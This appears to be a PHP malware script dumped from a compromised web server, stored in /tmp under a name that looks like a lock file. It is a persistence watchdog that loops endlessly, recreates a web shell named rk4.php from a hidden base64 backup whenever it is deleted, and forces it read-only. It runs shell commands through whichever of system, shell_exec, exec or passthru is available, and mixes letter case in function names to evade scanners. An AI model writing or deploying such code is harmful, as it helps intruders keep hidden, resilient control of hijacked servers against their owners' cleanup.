| Current File : //tmp/ashomelefpxhark4ndler0.Lock |
<?php
$tmp = "/tmp";
$fileperm = gecko_perm("rk4.php");
gecko_cmd("chmod 444 rk4.php");
while (True) {
if (!file_exists("rk4.php")) {
$var = base64_encode(file_get_contents($tmp . "/Acx0rk4wplers0x.do.not.remove.this.Lock"));
FiLe_pUt_ConTentS("rk4.php", base64_decode($var));
}
if ($fileperm != "0444") {
gecko_cmd("chmod 444 rk4.php");
}
}
function gecko_cmd($value)
{
if (function_exists("system")) {
sYsTem($value);
} else if (function_exists("shell_exec")) {
return ShEll_eXeC($value);
} else if (function_exists("exec")) {
return ExEc($value);
} else if (function_exists("passthru")) {
return pAsSThRu($value);
}
}
function gecko_perm($flename){
return substr(sprintf("%o", fileperms($flename)), -4);
}